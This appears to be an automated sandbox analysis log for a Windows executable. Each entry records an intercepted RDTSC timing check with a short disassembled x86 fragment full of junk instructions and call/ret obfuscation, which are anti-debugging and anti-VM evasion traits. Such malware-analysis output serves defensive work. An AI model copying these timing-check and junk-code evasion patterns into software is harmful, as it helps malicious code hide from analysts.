Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3D80 second address: FA3DBB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1F50CBBC38h 0x00000008 jng 00007F1F50CBBC3Ch 0x0000000e js 00007F1F50CBBC36h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F1F50CBBC3Ch 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f jp 00007F1F50CBBC36h 0x00000025 jbe 00007F1F50CBBC36h 0x0000002b push esi 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA6BD6 second address: FA6BF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F1F50F77980h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA6BF0 second address: FA6BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA8C90 second address: FA8C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA8C96 second address: FA8CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 56E3A996h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F1F50CBBC38h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D2D4Ah], ebx 0x00000031 call 00007F1F50CBBC39h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA8CDE second address: FA8CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9151 second address: FA9156 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA9910 second address: FA991A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAA400 second address: FAA468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F1F50CBBC38h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D3512h] 0x00000027 or dword ptr [ebp+122D1B26h], eax 0x0000002d push 00000000h 0x0000002f mov esi, dword ptr [ebp+122D3726h] 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D28B8h], esi 0x0000003d xchg eax, ebx 0x0000003e jc 00007F1F50CBBC40h 0x00000044 pushad 0x00000045 push edx 0x00000046 pop edx 0x00000047 jg 00007F1F50CBBC36h 0x0000004d popad 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1F50CBBC3Dh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAD660 second address: FAD664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAD664 second address: FAD66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FADF34 second address: FADF3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFBE1 second address: FAFBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FADF3A second address: FADF40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFBE5 second address: FAFBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FADF40 second address: FADF44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAFBEB second address: FAFBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F1F50CBBC36h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0271 second address: FB0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0D33 second address: FB0D39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0A70 second address: FB0A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F1F50F77978h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0D39 second address: FB0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1F50CBBC36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0DDF second address: FB0DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB0DE5 second address: FB0DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2367 second address: FB238D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F1F50F77976h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB15F3 second address: FB1609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 push eax 0x00000007 jmp 00007F1F50CBBC3Bh 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB238D second address: FB2391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2391 second address: FB239A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3FC1 second address: FB3FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB41BF second address: FB41C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB41C8 second address: FB41CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB5245 second address: FB5249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB5249 second address: FB5257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6FBA second address: FB6FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB6FD7 second address: FB7030 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F50F7797Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F1F50F77976h 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D194Ah], edx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F1F50F77978h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F1F50F77983h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7030 second address: FB7035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7035 second address: FB703B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7F94 second address: FB7F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7F98 second address: FB7FB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F1F50F77984h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7FB8 second address: FB801A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F1F50CBBC38h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 movsx edi, bx 0x00000028 mov dword ptr [ebp+122D1817h], ecx 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D1817h], edx 0x00000036 push 00000000h 0x00000038 cld 0x00000039 xchg eax, esi 0x0000003a js 00007F1F50CBBC3Ah 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push edi 0x00000045 pop edi 0x00000046 jno 00007F1F50CBBC36h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB801A second address: FB8020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8020 second address: FB8024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8024 second address: FB8028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB81DC second address: FB81E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1F50CBBC36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8FB3 second address: FB9020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D34D2h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F1F50F77978h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D1E53h], ebx 0x0000002f or ebx, dword ptr [ebp+12498675h] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F1F50F77978h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 00000018h 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 jmp 00007F1F50F7797Ah 0x00000056 xchg eax, esi 0x00000057 pushad 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9020 second address: FB9028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9028 second address: FB9035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB9035 second address: FB903B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB903B second address: FB9040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA074 second address: FBA100 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F1F50CBBC3Ch 0x00000010 pop edx 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F1F50CBBC38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+1246B07Ch] 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F1F50CBBC38h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 jmp 00007F1F50CBBC47h 0x00000056 push 00000000h 0x00000058 xchg eax, esi 0x00000059 jng 00007F1F50CBBC3Eh 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA100 second address: FBA10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB919B second address: FB91A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBA10B second address: FBA10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB91A0 second address: FB91C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c js 00007F1F50CBBC36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB10A second address: FBB17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bl, ch 0x0000000b push 00000000h 0x0000000d adc bl, 00000055h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F1F50F77978h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F1F50F77985h 0x00000031 push eax 0x00000032 pushad 0x00000033 jmp 00007F1F50F7797Fh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F1F50F77987h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBC1D2 second address: FBC211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F1F50CBBC47h 0x0000000d nop 0x0000000e sbb di, 6EE8h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 mov bl, ah 0x00000019 xchg eax, esi 0x0000001a jmp 00007F1F50CBBC3Dh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBC211 second address: FBC215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBB300 second address: FBB304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0191 second address: FC019B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBD379 second address: FBD3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F50CBBC36h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F1F50CBBC38h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F1F50CBBC38h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e cmc 0x0000004f mov eax, dword ptr [ebp+122D0121h] 0x00000055 add bx, D4E8h 0x0000005a push FFFFFFFFh 0x0000005c adc ebx, 321BA434h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F1F50CBBC40h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE323 second address: FBE385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1F50F77976h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 or edi, dword ptr [ebp+122D33E6h] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e sub ebx, 4C2C5649h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b xor ebx, dword ptr [ebp+122D363Eh] 0x00000031 mov eax, dword ptr [ebp+122D0015h] 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F1F50F77978h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push FFFFFFFFh 0x00000053 or dword ptr [ebp+122D2650h], ebx 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e pop eax 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBC33A second address: FBC33F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBC33F second address: FBC3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov ebx, 0F427FB9h 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e sub dword ptr [ebp+122D1B5Ch], ebx 0x00000024 mov eax, dword ptr [ebp+122D1731h] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F1F50F77978h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov dword ptr [ebp+12469831h], ecx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F1F50F77978h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2FCBh], edi 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBC3B6 second address: FBC3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC2FB8 second address: FC2FCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F1F50F77976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1F50F7797Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3225 second address: FC322F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F50CBBC3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCBDAF second address: FCBDC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F50F77978h 0x00000008 js 00007F1F50F7797Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDC71 second address: FCDC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDC76 second address: FCDC84 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F1F50F77976h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDC84 second address: FCDC94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD20A9 second address: FD20AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD210C second address: FD2110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2110 second address: FD211E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F1F50F77976h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD211E second address: FD2144 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F1F50CBBC44h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD2144 second address: FD214A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDAB79 second address: FDAB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
